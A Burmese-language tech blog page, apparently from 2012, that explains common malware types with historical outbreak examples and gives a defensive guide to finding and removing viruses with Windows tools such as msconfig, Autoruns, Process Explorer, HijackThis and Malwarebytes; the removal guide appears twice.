ပိုထိခိုက္ေစေလ လူေတြေတာ္ေၾကာင္း ပိုၾကြားသလို ျဖစ္ေလပဲေပါ့။ ထြင္တဲ့လူေတြကိုပဲ ေက်းဇူးတင္ပါတယ္ လုိက္ေျပာရမလုိပဲေနာ္။ Virus ဆိုတာကလည္း တစ္ႏွစ္ၿပီးတစ္ႏွစ္ကို ေပၚလာတာအမ်ဳိးမ်ဳိးပဲ။ ၂၀၀၄၊ ဇန္န၀ါရီတုန္းကဆို Mydoom Worm ေပၚလာၿပီး တစ္ရက္တည္းမွာတင္ မီလ်ံေလးပံုတစ္ပံုေလာက္ ရွိတဲ့ Computer ေတြကို ကူးသြားတာ။ ၿပီးခဲ့တဲ့ ၁၉၉၉ မတ္လတုန္းကလည္း ၾကည့္ပါလား။ Melissa Virus ဆိုျပီး ေပၚလာတယ္ေလ။ Microsoft နဲ႔တစ္ျခားကုမၸဏီ အႀကီးႀကီးေတြ အားလံုး Virus ရွိေနသမွ် သုူတုိ႔ E-mail System ေတြကို သံုးလုိ႔မရဘူးျဖစ္သြားတာ။ ၂၀၀၀ ျပည့္ႏွစ္တုန္းက I Love You Virus တုန္းကလည္းဒီအတုိင္းပဲ။ ေဟာ.. ၂၀၀၇၊ ဇန္န၀ါရီလည္း ေရာက္ေရာ Storm ဆိုတဲ့ Worm တစ္ေကာင္ေပၚလာျပန္ေရာ။ အဲဒီ Virus ေၾကာင့္ ေအာက္တုိဘာလလည္းက်ေရာ ကြန္ပ်ဴတာေပါင္း သန္း ၅၀ အထက္ကို အကူးခံရပါေရာလား။ ကဲၾကည့္ေလ..ဘယ္ေလာက္ေတာင္ အထင္ႀကီးစရာေကာင္းတဲ့ Virus ေတြလဲလို႔..။ IT နဲ႔ ပတ္သက္တဲ့ သတင္းေတြကို နားေထာင္တဲ့လူတိုင္းက Virus ကူးပံုကူးနည္းအမ်ဳိးမ်ဳိး အေၾကာင္းၾကားေနရမွာ အမွန္ပဲ။ ဒီေအာက္မွာေဖာ္ျပေပးထားတဲ့ Viruses ေတြကို ေဖာ္ျပေပးထားပါတယ္။

(၁)Viruses

Virus ဆိုတဲ့ေကာင္က Software ေလးပဲ။ Software မွာမွ တကယ့္ လူေတြအသံုးမ်ားတဲ့၊ သံုးေနတဲ့ Program ေတြ၊ ေနာက္မွာကပ္ပါးလ်က္ပါး ခိုးေၾကာင္ခိုး၀ွက္လုိက္လာတဲ့ ေကာင္ေတြေပါ့။ ဥပမာေျပာရရင္ Spreadsheet Program ေလး ေနာက္မွာ Virus ေလးကကပ္ပါလာတယ္ဆိုပါေတာ့။ ဒီေတာ့ အဲဒီ Spreadsheet Program Run တိုင္း၊ Run တိုင္းမွာ Virus Program ေလးကလည္းလိုက္ Run ေနတာေပါ့။ ဒီေကာင္က Program တစ္ခုမွာ ကပ္ရံုနဲ႔ မၿပီးဘူး။ၿဂိဳလ္သားေတြလုိပဲ.. ပြားႏို္င္တယ္။ အခု ဒီ Program ကေန၊ ေနာက္ Program ေတြကိုလည္း လုိက္ကပ္ႏုိ္င္ေသးတယ္။

(၂)Email Virus

Email Virus ကေတာ့ Email Virus ဆိုတဲ့အတုိင္းပဲ။ လူေတြ လူေတြ ပို႔သမွ် Email ေနာက္ကေန ကပ္လိုက္သြားတာလား။ လုိက္လည္းလုိက္သြားျပီးေရာ အကူးခံရတဲ့ လူရဲ႕ Address Book ထဲကေန၀င္ျပီး တစ္ျခားလူေတြဆီ သူ႔ဟာသူ ေအာ္တုိ Mail ေတြ ပို႔ေတာ့တာပဲ။ အဲဒီေတာ့ အပို႔ခံရတဲ့ လူကမသိ၊ ဖြင့္လည္းဖြင့္လုိက္ေရာ သူ႔ Address Book ထဲ ပါ၀င္ၿပီး ကူးျပီးေတာ့ ေနာက္လူေတြပါ ဆက္ပို႔ေတာ့တာပဲ။ တစ္ဆင့္ကူး၊ တစ္ဆင့္ကူးနဲ႔ ပလူပ်ံကုန္ေတာ့ တာေပါ့။ G-Galk Virus က အဲဒီလိုမ်ဳိးသြားတာေလ။

(၃)Trojan Horses

Trojan Horses ကလည္း ကြန္ပ်ဴတာ Program တစ္ခုပဲ။ ဒါေပမယ့္ ဒီေကာင္က အေယာင္ေဆာင္ေကာင္။ ဥပမာ-Game လိုလို၊ ဘာလိုလို အေယာင္ေဆာင္ထားတာေပါ့။ ကိုယ္ကမသိလို႔သြားလည္း Run လုိက္ေရာ...ကိုယ့္စက္ႀကီးဖ်က္ခံရပါေလေရာ..။ အခန္႔မသင့္ရင္ Hard Disk ကိုေတာင္ ၀င္ကိုက္သြားတာေနာ္။ ဒါေပမယ့္ ဒီေကာင္က သူ႔ဟာသူမပြားႏိုင္ဘူး။

(၄)Worms

Worm ကေတာ့ Network ေတြ၊ Security ေတြရဲ႕ ယိုေပါက္ေတြကေန တစ္ဆင့္ ကူးျပီး သူ႔ဟာသူ ဆက္ပြားသြားတာ။ Worm ရဲ႕ Copy ေကာင္က ဘယ္စက္မွာ Security ပိုင္း ယိုကြက္/ ဟာကြက္ရွိေနလဲလိုက္ေခ်ာင္း၊ ေခ်ာင္းျပီးလို႔ေတြ႔တာနဲ႔ကူးေတာ့တာပဲ။ ကူးျပီးတာနဲ႔ ဘယ္စက္ကို ထပ္ကူးရင္ေကာင္းမလဲ ထပ္ရွာတယ္။ အဲဒီလိုနဲ႔ မ်ဳိးပြားတဲ့ ေကာင္ေတြ၊ ေရာက္ရာအရပ္မွာ မ်ဳိးေစ့ခ်တယ္ေလ။ ကဲ ဒါကေတာ့ Worms Virus ပါပဲ။

source:ICT Reader
Saw Linux  /  8:00 AM  /    /  No comments
တကယ္တမ္း ကြန္ပ်ဴတာ ဗိုင္းရပ္စ္ ေတြကုိ ရွင္းလင္းရတယ္ဆုိတာ လြယ္ကူတဲ႔ကိစၥမဟုတ္သလုိ မိမိရဲ႕ အဖိုးတန္တဲ႔ အခ်ိန္တစ္ခ်ဳိ႕ကုိေပးဆပ္ၾကရတာပါ။ ဘယ္ကြန္ပ်ဴတာမွ Virus တစ္မ်ဳိးတည္း ရတယ္ဆုိတာ မရွိပဲနဲ႔ မိမိရဲ႕အိမ္မွာ ပုရြက္ဆိတ္ေလးေတြ ၀င္လာသလုိပါပဲ ေနာက္ဆုံး တပ္စုၾကီးနဲ႔ပဲ ၿပန္လည္ထြက္ခြာသြားၾကတာပါ။

Antivirus ဆုိတာ အေကာင္းမြန္ဆုံး ကာကြယ္ေရး တပ္ဖြဲ႕ၾကီးၿဖစ္တယ္ သုိ႔ေပမယ့္လည္း ၄င္း Antivirus က out of date ၿဖစ္ေနမယ္ဆုိရင္ အသုံး၀င္တဲ႔ antivirus program တစ္ခုၿဖစ္လာမွာမဟုတ္ပါဘူး။ ဒီေတာ့ virus ေတြကုိ ခုခံတုိက္ခုိက္ဖုိ႔၊ virus ရွိမရွိဆုိတာ သိဖုိ႔အတြက္ သံသယၿဖစ္ဖြယ္ရာ processing ေတြ၊ ဖုိင္ေတြကုိ သိဖုိ႔လုိပါတယ္။ ဒီလုိ ဒုကၡေပးႏုိင္တဲ႔ virus ေတြကုိ config, taskmanager နဲ႔ autoruns tools ေတြနဲ႔ ရွာေဖြၾကရတယ္။ ဒါေၾကာင့္ သံသယ ၿဖစ္ဖြယ္ process ေတြကုိ မိတ္ေဆြတုိ႔အေနဲ႔ ရွာေတာ့မယ္ဆုိရင္ ဒီ file က ဘယ္ကလာတာလဲ၊ registry keys ေတြအတြက္ ေလးလံေစတဲ႔ ဖုိင္ေတြလား၊ ဘယ္လုိ services ေတြကုိ အသုံးၿပဳေနလဲ၊ ဘယ္ startup program ေတြထဲမွာ ဘယ္လုိဖုိင္ေတြအေနနဲ႔ ၀င္ေရာက္ အသုံးၿပဳေနလဲဆုိတာကုိ သိဖုိ႔လုိပါတယ္။ အကယ္၍မ်ား virus ကုိ ရွင္းလင္းလုိက္ဖုိ႔ ၂ နာရီေလာက္ အခ်ိန္ၾကာမယ္ဆုိရင္ အဲ႔လုိရွင္းလင္းလုိက္ဖုိ႔ထက္ Operating System ကုိၿပန္လည္၍ အသစ္တင္လုိက္မည္ဆုိေသာ အခ်က္နဲ႔ ညိွႏႈိင္းရပါလိမ့္မယ္။ ဒါက အခ်ိန္ကုန္မခံေစခ်င္တဲ႔အတြက္ ေၾကာင့္ပင္ၿဖစ္သည္။

Virus ရဲ႕ အဓိပၸါယ္။ အရုိးရွင္းဆုံး ေ၀ါဟာရတစ္ခုအေနနဲ႔ Computer Virus ဆုိတာ သူကုိယ္တုိင္ ဖုိင္တစ္ခုကုိ ဖန္တီးႏုိင္တယ္ ကူးယူႏုိင္တယ္။ လုံၿခံဳေရး ဆုိင္ရာ program ေတြကုိ စိန္ေခၚ ၿခိမ္းေၿခာက္ႏုိင္တဲ႔ အစြမ္းေတြရွိတယ္။ တစ္ခ်ဳိ႕ virus ေတြက သတ္မွတ္ထားတဲ႔ ဖုိင္ေတြကုိ delete လုပ္ႏုိင္တယ္၊ တစ္ခ်ဳိ႕က user ေတြ ကြန္ပ်ဴတာရဲ႕ password နဲ႔ information ေတြကုိ ခုိးယူႏုိင္တယ္။ တစ္ခ်ဳိ႕ၾကၿပန္ေတာ့ မိမိရဲ႕ ကြန္ပ်ဴတာကုိ OS တက္မလာေလာက္ေအာင္ ဖ်က္စီးမႈ႔လုပ္ႏုိင္ၾကတယ္။ အၾကမ္းဖ်င္းအားၿဖင့္ - Virus = ကုိယ္တုိင္ copy ကူးယူႏုိင္ေသာ file တစ္ခု Trojan = virus သုိ႔မဟုတ္ malware ေတြပါ၀င္ေသာ program တစ္ခု Spyware = ကြန္ပ်ဴတာ ကုိထိန္းခ်ဴပ္ခြင့္ရရန္ သိုမဟုတ္ ၾကားေဖါက္၀င္ေရာက္ႏုိင္ေအာင္ ဖန္တီးထားေတာ့ ဖုိင္ သို႔မဟုတ္ program တစ္ခု Maleware = ကြန္ပ်ဴတာအား ပုိင္ရွင္၏ ခြင့္ၿပဳခ်က္မရပဲ ပ်က္စီးရာ ပ်က္စီးေၾကာင္း ဖန္တီးႏုိင္ေသာ program Worm = Network အေပၚမွာ လမ္းသလားေသာ virus

Virus ဖယ္ရွားၿခင္း။ မိမိကြန္ပ်ဴတာမွာ virus ရွိသည္ဟု ယူဆပါက Up to Date ၿဖစ္ေနေသာ Antivirus program ေတြနဲ႔ စစ္ေဆးေပးပါ။ Antivirus program က detect သိလုိ႔ ဖယ္ရွားႏုိင္တယ္ဆုိ ရင္ေတာ့ ကံေကာင္းတာေပါ႔။ AV ေတြ Detect သိတယ္.. Remove မလုပ္ႏုိင္ေတာ့ဘူးဆုိရင္ေတာ့ ၿဖစ္ေနတဲ action နဲ႔ file ကုိ မွတ္သားထားပါ .. ၿပီးရင္ Search Engine မွာ ၄င္းဖုိင္ နဲ႔ ၄င္း virus ရဲ႕ ဒုကၡေပးပုံေတြကုိ ေၿပာဆုိ အကူအညီေတာင္းပါ။ ၿပီးလ်င္လမ္းညြန္အတုိင္းေၿဖရွင္းမွာ။ ေၿဖရွင္းမႈ႔မလုပ္ခင္တုိင္းမွာ မိမိရဲ႕ အေရးၾကီးတဲ႔ ဖုိင္ေတြကုိ backup လုပ္ထားပါ။

Virus Detect မသိခဲ႔ရင္ ကြန္ပ်ဴတာမွာ AntiVirus / AntiSpyware program ေတြအေနနဲ႔ Detect မသိဘူး သုိ႔ေသာ္ ကြန္ပ်ဴတာက အရင္အတုိင္းပဲ ေႏွးၿမဲေႏွးေနမယ္ဆုိရင္ေတာ့ background processes ေတြကုိ ၾကည့္ရပါလိမ့္မယ္။ ဒီအတြက္ special tool ေလးေတြက အဓိက တာ၀န္ထမ္းေဆာင္ရလိမ့္မယ္။ ဥပမာ :- task manager, autoruns, process explorer and hijackthis တုိ႔လုိေပါ႔။

Checking Running Processes ကၽြန္ေတာ္တုိ႔ PC တစ္လုံး Error ၿဖစ္တယ္ဆုိရင္ ပထမဦးဆုံးအၾကိမ္ task manager (Ctrl + Alt+ Del) ကုိ ေခၚၾကည့္တယ္. ၿပီးရင္ ဘယ္လုိ file နဲ႔ services ေတြ Run ေနလဲ Memory usage ေတြဘယ္ေလာက္မ်ားမ်ားကုိ ဘယ္လုိ file ေတြက အသုံးၿပဳေနလဲဆုိတာကုိၾကည့္မယ္။ ၿပီးရင္ System Configuration Ultility (RUN>msconfig) က ေနဘယ္ serivces ေတြ နဲ႔ ဘယ္ဖုိင္ေတြက Operating System (Windows ) startup မွာ ၀င္ေရာက္ေနလဲဆုိတာကုိပါၾကည့္ပါ။အကယ္၍ starup မွာ ထူးထူးၿခားၿခား file အမည္ေလးေတြနဲ႔ ၀င္ေနတာေတြ႔ရင္

တုိ႔မွာသြားၿပီး ဖုိင္အမည္ကုိ ရုိက္ထည့္စစ္ေဆးၾကည့္ပါ။ ဘာေၾကာင့္လဲဆုိေတာ့ တစ္ခ်ဳိ႕ ဖုိင္ေတြက system file ေတြနဲ႔ပုံစံတူေတြၿဖစ္ေနတတ္တယ္။ မိမိကြန္ပ်ဴတာအတြက္ အေရးမပါတဲ႔ processes ေတြကုိ end လုပ္ပါ။

System Configuration Utility

RUN dialog box မွာ msconfig ဆုိၿပီးေတာ့ ရုိက္ထည့္လုိက္ ၿပီးရင္ System Configuration Utility ဆုိတာေပၚလာမယ္... ဒါကေတာ့ Microsoft Windows မွာဆုိရင္ အေကာင္းဆုံး ကြန္ပ်ဴတာကုိၿပင္ဆင္မႈ႔ပုိင္းမွာ အေထာက္အကူၿပဳတဲ႔ utility ပဲၿဖစ္တယ္။ ေနာက္ဆုံး ဘာမွမသိဘူးပဲထား startup tab မွာ Disable All ဆုိတာကုိ ႏုိပ္မယ္။ ေနာက္ Services tab မွာ Hide All Microsoft Services ဆုိတာကုိ အမွန္ၿခစ္မယ္. ၿပီးရင္ Disable All ဆုိၿပီးႏုိပ္ restart လုပ္လုိက္ရင္ မိမိရဲ႕ ကြန္ပ်ဴတာ system ဟာပုံမွန္ထက္သိသိသာသာကုိ ေကာင္းမြန္လာတာကုိေတြ႔ရလိမ့္မယ္။ ဒီပုံစံနဲ႔ တစ္ခါတစ္ေလ ဘာ error မွန္းမသိ (အထူးသၿဖင့္ Software Conflict ၿဖစ္၍ windows normal ၀င္မရၿခင္း) တဲ႔ ၿပႆနာေတြကုိ F8 ႏုိပ္ကာ Safe Mode ထဲကေန ၿပင္ၿပီးသုံးသြားရင္ေတာင္ အဆင္ေၿပပါတယ္။

All-in-one diagnostic Tools Autoruns

ဒီ software က Task manager, msconfig and the services list ေတြ စသည့္ system diagnostic အစုံပါတဲ႔ freeware ေလးတစ္ခုပါ။

Process Explorer

ဒါေလးကေတာ့ အေပၚက ပုံစံပါပဲ.. သူ႔ရဲ႕ ထူးၿခားခ်က္ကေတာ့ file တစ္ခုၿခင္းစီအတြက္ ကုိယ္ပုိင္ ထိန္းခ်ဳပ္မႈ႔ပါ၊ CPU,IO,VM ေတြအၿပင္ performace graphed ေတြပါတယ္။

Hijack This

Technician ေတြနဲ႔ ကြန္ပ်ဴတာ နဲ႔နည္းစပ္သူေတြေတာ္ေတာ္ေတာ္မ်ားမ်ားသိၾကတဲ႔ Tool ပါ။ ဒါေပမဲ႔ ၄င္းတုိ႔မွာ ပါ၀င္တဲ႔ R0,R1,R2,R3 / F0,F1,F2,F3 / 01 / 04 / 23 စသည့္ notable entries ေလးေတြကုိ သတိမထားမိတတ္ပါဘူး။ R0,R1,R2,R3 ဆုိတာက အင္တာနက္ အြန္လုိင္း အမွားအယြင္းေတြ၊ အထူးသၿဖင့္ Internet Browser ေတြေပါ႔... အေသးစိတ္ကုိ

Malware Bytes

Antivirus Program ေတြက ၄င္းတုိ႔ရဲ႕ Virus Signiture ေတြနဲ႔ၿငိတဲ႔ ဖုိင္ေတြကုိ စစ္မယ္၊ Anti Spyware ေတြက Registry Entries မွာ ၄င္းတုိ႔ Spyware အၿဖစ္သတ္မွတ္ထားတဲ႔ ဖုိင္ေတြကုိ စစ္မယ္။ ဒါေပမဲ႔ တစ္ခ်ဳိ႕ malware ေတြကုိ antivirus ေတြ antispyware ေတြ Detect သိေသာ္ၿငားလည္း သူတုိ႔ကုိ Delete မလုပ္ဘူး( Delete လုပ္ဖုိ႔လည္း သူတုိ႔မွာ Power မရွိသလုိ၊ System File လား၊ ဘာလား မခြဲၿခားႏုိင္ၿခင္း၊ ၄င္း malware ေတြနဲ႔ familiar ၿဖစ္ေနၿခင္း)။ (မွတ္ခ်က္ - တစ္ခ်ဳိ႕ Antivirus program ေတြက အဲ႔လုိ malware ရရင္ ေတြ႔သမွ် အကုန္ဖ်က္ပါတယ္...ဘာဖုိင္မွကုိမထားပါဘူး။ ၿပီးရင္ေတာ့ စက္ေတာင္ မတက္ေတာ့ဘူး။ မိမိရဲ႕ ကြန္ပ်ဴတာက malware ကုိက္လုိ႔ ဘာမွမၿဖစ္ပဲနဲ႔ Antivirus run လုိက္မွ ေနာက္ဆုံး ရွိတဲ႔ ဖုိင္ေလးေတြပါ အကုန္ေၿပာင္သြားတတ္ပါတယ္။) ဒါေၾကာင့္ ၄င္း malware ေတြက မိမိရဲ႕ Running System နဲ႔ Applications ေတြကုိ နည္းမ်ဳိးစုံနဲ႔ဒုကၡေပး၊ application သုံးေနရင္းနဲ႔ ရုတ္တရက္ပိတ္၊ error က် အဲ႔လုိေတြၿဖစ္လာတတ္တယ္။ ဒီအတြက္ Maleware Bytes ဆုိတဲ႔ software ေလးက အဆင္ေၿပဆုံးပါ။

Download Links:http://technet.microsoft.com/en-us/sysinternals/bb545046

Ref:Ref: mediasection/www.planetcreator.net & World wide myanmar
Saw Linux  /  8:00 AM  /    /  No comments
တကယ္တမ္း ကြန္ပ်ဴတာ ဗိုင္းရပ္စ္ ေတြကုိ ရွင္းလင္းရတယ္ဆုိတာ လြယ္ကူတဲ႔ကိစၥမဟုတ္သလုိ မိမိရဲ႕ အဖိုးတန္တဲ႔ အခ်ိန္တစ္ခ်ဳိ႕ကုိေပးဆပ္ၾကရတာပါ။ ဘယ္ကြန္ပ်ဴတာမွ Virus တစ္မ်ဳိးတည္း ရတယ္ဆုိတာ မရွိပဲနဲ႔ မိမိရဲ႕အိမ္မွာ ပုရြက္ဆိတ္ေလးေတြ ၀င္လာသလုိပါပဲ ေနာက္ဆုံး တပ္စုၾကီးနဲ႔ပဲ ၿပန္လည္ထြက္ခြာသြားၾကတာပါ။

Antivirus ဆုိတာ အေကာင္းမြန္ဆုံး ကာကြယ္ေရး တပ္ဖြဲ႕ၾကီးၿဖစ္တယ္ သုိ႔ေပမယ့္လည္း ၄င္း Antivirus က out of date ၿဖစ္ေနမယ္ဆုိရင္ အသုံး၀င္တဲ႔ antivirus program တစ္ခုၿဖစ္လာမွာမဟုတ္ပါဘူး။ ဒီေတာ့ virus ေတြကုိ ခုခံတုိက္ခုိက္ဖုိ႔၊ virus ရွိမရွိဆုိတာ သိဖုိ႔အတြက္ သံသယၿဖစ္ဖြယ္ရာ processing ေတြ၊ ဖုိင္ေတြကုိ သိဖုိ႔လုိပါတယ္။ ဒီလုိ ဒုကၡေပးႏုိင္တဲ႔ virus ေတြကုိ config, taskmanager နဲ႔ autoruns tools ေတြနဲ႔ ရွာေဖြၾကရတယ္။ ဒါေၾကာင့္ သံသယ ၿဖစ္ဖြယ္ process ေတြကုိ မိတ္ေဆြတုိ႔အေနဲ႔ ရွာေတာ့မယ္ဆုိရင္ ဒီ file က ဘယ္ကလာတာလဲ၊ registry keys ေတြအတြက္ ေလးလံေစတဲ႔ ဖုိင္ေတြလား၊ ဘယ္လုိ services ေတြကုိ အသုံးၿပဳေနလဲ၊ ဘယ္ startup program ေတြထဲမွာ ဘယ္လုိဖုိင္ေတြအေနနဲ႔ ၀င္ေရာက္ အသုံးၿပဳေနလဲဆုိတာကုိ သိဖုိ႔လုိပါတယ္။ အကယ္၍မ်ား virus ကုိ ရွင္းလင္းလုိက္ဖုိ႔ ၂ နာရီေလာက္ အခ်ိန္ၾကာမယ္ဆုိရင္ အဲ႔လုိရွင္းလင္းလုိက္ဖုိ႔ထက္ Operating System ကုိၿပန္လည္၍ အသစ္တင္လုိက္မည္ဆုိေသာ အခ်က္နဲ႔ ညိွႏႈိင္းရပါလိမ့္မယ္။ ဒါက အခ်ိန္ကုန္မခံေစခ်င္တဲ႔အတြက္ ေၾကာင့္ပင္ၿဖစ္သည္။

Virus ရဲ႕ အဓိပၸါယ္။ အရုိးရွင္းဆုံး ေ၀ါဟာရတစ္ခုအေနနဲ႔ Computer Virus ဆုိတာ သူကုိယ္တုိင္ ဖုိင္တစ္ခုကုိ ဖန္တီးႏုိင္တယ္ ကူးယူႏုိင္တယ္။ လုံၿခံဳေရး ဆုိင္ရာ program ေတြကုိ စိန္ေခၚ ၿခိမ္းေၿခာက္ႏုိင္တဲ႔ အစြမ္းေတြရွိတယ္။ တစ္ခ်ဳိ႕ virus ေတြက သတ္မွတ္ထားတဲ႔ ဖုိင္ေတြကုိ delete လုပ္ႏုိင္တယ္၊ တစ္ခ်ဳိ႕က user ေတြ ကြန္ပ်ဴတာရဲ႕ password နဲ႔ information ေတြကုိ ခုိးယူႏုိင္တယ္။ တစ္ခ်ဳိ႕ၾကၿပန္ေတာ့ မိမိရဲ႕ ကြန္ပ်ဴတာကုိ OS တက္မလာေလာက္ေအာင္ ဖ်က္စီးမႈ႔လုပ္ႏုိင္ၾကတယ္။ အၾကမ္းဖ်င္းအားၿဖင့္ - Virus = ကုိယ္တုိင္ copy ကူးယူႏုိင္ေသာ file တစ္ခု Trojan = virus သုိ႔မဟုတ္ malware ေတြပါ၀င္ေသာ program တစ္ခု Spyware = ကြန္ပ်ဴတာ ကုိထိန္းခ်ဴပ္ခြင့္ရရန္ သိုမဟုတ္ ၾကားေဖါက္၀င္ေရာက္ႏုိင္ေအာင္ ဖန္တီးထားေတာ့ ဖုိင္ သို႔မဟုတ္ program တစ္ခု Maleware = ကြန္ပ်ဴတာအား ပုိင္ရွင္၏ ခြင့္ၿပဳခ်က္မရပဲ ပ်က္စီးရာ ပ်က္စီးေၾကာင္း ဖန္တီးႏုိင္ေသာ program Worm = Network အေပၚမွာ လမ္းသလားေသာ virus

Virus ဖယ္ရွားၿခင္း။ မိမိကြန္ပ်ဴတာမွာ virus ရွိသည္ဟု ယူဆပါက Up to Date ၿဖစ္ေနေသာ Antivirus program ေတြနဲ႔ စစ္ေဆးေပးပါ။ Antivirus program က detect သိလုိ႔ ဖယ္ရွားႏုိင္တယ္ဆုိ ရင္ေတာ့ ကံေကာင္းတာေပါ႔။ AV ေတြ Detect သိတယ္.. Remove မလုပ္ႏုိင္ေတာ့ဘူးဆုိရင္ေတာ့ ၿဖစ္ေနတဲ action နဲ႔ file ကုိ မွတ္သားထားပါ .. ၿပီးရင္ Search Engine မွာ ၄င္းဖုိင္ နဲ႔ ၄င္း virus ရဲ႕ ဒုကၡေပးပုံေတြကုိ ေၿပာဆုိ အကူအညီေတာင္းပါ။ ၿပီးလ်င္လမ္းညြန္အတုိင္းေၿဖရွင္းမွာ။ ေၿဖရွင္းမႈ႔မလုပ္ခင္တုိင္းမွာ မိမိရဲ႕ အေရးၾကီးတဲ႔ ဖုိင္ေတြကုိ backup လုပ္ထားပါ။

Virus Detect မသိခဲ႔ရင္ ကြန္ပ်ဴတာမွာ AntiVirus / AntiSpyware program ေတြအေနနဲ႔ Detect မသိဘူး သုိ႔ေသာ္ ကြန္ပ်ဴတာက အရင္အတုိင္းပဲ ေႏွးၿမဲေႏွးေနမယ္ဆုိရင္ေတာ့ background processes ေတြကုိ ၾကည့္ရပါလိမ့္မယ္။ ဒီအတြက္ special tool ေလးေတြက အဓိက တာ၀န္ထမ္းေဆာင္ရလိမ့္မယ္။ ဥပမာ :- task manager, autoruns, process explorer and hijackthis တုိ႔လုိေပါ႔။

Checking Running Processes ကၽြန္ေတာ္တုိ႔ PC တစ္လုံး Error ၿဖစ္တယ္ဆုိရင္ ပထမဦးဆုံးအၾကိမ္ task manager (Ctrl + Alt+ Del) ကုိ ေခၚၾကည့္တယ္. ၿပီးရင္ ဘယ္လုိ file နဲ႔ services ေတြ Run ေနလဲ Memory usage ေတြဘယ္ေလာက္မ်ားမ်ားကုိ ဘယ္လုိ file ေတြက အသုံးၿပဳေနလဲဆုိတာကုိၾကည့္မယ္။ ၿပီးရင္ System Configuration Ultility (RUN>msconfig) က ေနဘယ္ serivces ေတြ နဲ႔ ဘယ္ဖုိင္ေတြက Operating System (Windows ) startup မွာ ၀င္ေရာက္ေနလဲဆုိတာကုိပါၾကည့္ပါ။အကယ္၍ starup မွာ ထူးထူးၿခားၿခား file အမည္ေလးေတြနဲ႔ ၀င္ေနတာေတြ႔ရင္

တုိ႔မွာသြားၿပီး ဖုိင္အမည္ကုိ ရုိက္ထည့္စစ္ေဆးၾကည့္ပါ။ ဘာေၾကာင့္လဲဆုိေတာ့ တစ္ခ်ဳိ႕ ဖုိင္ေတြက system file ေတြနဲ႔ပုံစံတူေတြၿဖစ္ေနတတ္တယ္။ မိမိကြန္ပ်ဴတာအတြက္ အေရးမပါတဲ႔ processes ေတြကုိ end လုပ္ပါ။

System Configuration Utility

RUN dialog box မွာ msconfig ဆုိၿပီးေတာ့ ရုိက္ထည့္လုိက္ ၿပီးရင္ System Configuration Utility ဆုိတာေပၚလာမယ္... ဒါကေတာ့ Microsoft Windows မွာဆုိရင္ အေကာင္းဆုံး ကြန္ပ်ဴတာကုိၿပင္ဆင္မႈ႔ပုိင္းမွာ အေထာက္အကူၿပဳတဲ႔ utility ပဲၿဖစ္တယ္။ ေနာက္ဆုံး ဘာမွမသိဘူးပဲထား startup tab မွာ Disable All ဆုိတာကုိ ႏုိပ္မယ္။ ေနာက္ Services tab မွာ Hide All Microsoft Services ဆုိတာကုိ အမွန္ၿခစ္မယ္. ၿပီးရင္ Disable All ဆုိၿပီးႏုိပ္ restart လုပ္လုိက္ရင္ မိမိရဲ႕ ကြန္ပ်ဴတာ system ဟာပုံမွန္ထက္သိသိသာသာကုိ ေကာင္းမြန္လာတာကုိေတြ႔ရလိမ့္မယ္။ ဒီပုံစံနဲ႔ တစ္ခါတစ္ေလ ဘာ error မွန္းမသိ (အထူးသၿဖင့္ Software Conflict ၿဖစ္၍ windows normal ၀င္မရၿခင္း) တဲ႔ ၿပႆနာေတြကုိ F8 ႏုိပ္ကာ Safe Mode ထဲကေန ၿပင္ၿပီးသုံးသြားရင္ေတာင္ အဆင္ေၿပပါတယ္။

All-in-one diagnostic Tools Autoruns

ဒီ software က Task manager, msconfig and the services list ေတြ စသည့္ system diagnostic အစုံပါတဲ႔ freeware ေလးတစ္ခုပါ။

Process Explorer

ဒါေလးကေတာ့ အေပၚက ပုံစံပါပဲ.. သူ႔ရဲ႕ ထူးၿခားခ်က္ကေတာ့ file တစ္ခုၿခင္းစီအတြက္ ကုိယ္ပုိင္ ထိန္းခ်ဳပ္မႈ႔ပါ၊ CPU,IO,VM ေတြအၿပင္ performace graphed ေတြပါတယ္။

Hijack This

Technician ေတြနဲ႔ ကြန္ပ်ဴတာ နဲ႔နည္းစပ္သူေတြေတာ္ေတာ္ေတာ္မ်ားမ်ားသိၾကတဲ႔ Tool ပါ။ ဒါေပမဲ႔ ၄င္းတုိ႔မွာ ပါ၀င္တဲ႔ R0,R1,R2,R3 / F0,F1,F2,F3 / 01 / 04 / 23 စသည့္ notable entries ေလးေတြကုိ သတိမထားမိတတ္ပါဘူး။ R0,R1,R2,R3 ဆုိတာက အင္တာနက္ အြန္လုိင္း အမွားအယြင္းေတြ၊ အထူးသၿဖင့္ Internet Browser ေတြေပါ႔... အေသးစိတ္ကုိ

Malware Bytes

Antivirus Program ေတြက ၄င္းတုိ႔ရဲ႕ Virus Signiture ေတြနဲ႔ၿငိတဲ႔ ဖုိင္ေတြကုိ စစ္မယ္၊ Anti Spyware ေတြက Registry Entries မွာ ၄င္းတုိ႔ Spyware အၿဖစ္သတ္မွတ္ထားတဲ႔ ဖုိင္ေတြကုိ စစ္မယ္။ ဒါေပမဲ႔ တစ္ခ်ဳိ႕ malware ေတြကုိ antivirus ေတြ antispyware ေတြ Detect သိေသာ္ၿငားလည္း သူတုိ႔ကုိ Delete မလုပ္ဘူး( Delete လုပ္ဖုိ႔လည္း သူတုိ႔မွာ Power မရွိသလုိ၊ System File လား၊ ဘာလား မခြဲၿခားႏုိင္ၿခင္း၊ ၄င္း malware ေတြနဲ႔ familiar ၿဖစ္ေနၿခင္း)။ (မွတ္ခ်က္ - တစ္ခ်ဳိ႕ Antivirus program ေတြက အဲ႔လုိ malware ရရင္ ေတြ႔သမွ် အကုန္ဖ်က္ပါတယ္...ဘာဖုိင္မွကုိမထားပါဘူး။ ၿပီးရင္ေတာ့ စက္ေတာင္ မတက္ေတာ့ဘူး။ မိမိရဲ႕ ကြန္ပ်ဴတာက malware ကုိက္လုိ႔ ဘာမွမၿဖစ္ပဲနဲ႔ Antivirus run လုိက္မွ ေနာက္ဆုံး ရွိတဲ႔ ဖုိင္ေလးေတြပါ အကုန္ေၿပာင္သြားတတ္ပါတယ္။) ဒါေၾကာင့္ ၄င္း malware ေတြက မိမိရဲ႕ Running System နဲ႔ Applications ေတြကုိ နည္းမ်ဳိးစုံနဲ႔ဒုကၡေပး၊ application သုံးေနရင္းနဲ႔ ရုတ္တရက္ပိတ္၊ error က် အဲ႔လုိေတြၿဖစ္လာတတ္တယ္။ ဒီအတြက္ Maleware Bytes ဆုိတဲ႔ software ေလးက အဆင္ေၿပဆုံးပါ။

Download Links:http://technet.microsoft.com/en-us/sysinternals/bb545046

Ref:Ref: mediasection/www.planetcreator.net & World wide myanmar

Sunday, April 1, 2012

Saw Linux  /  8:47 AM  /    /  No comments
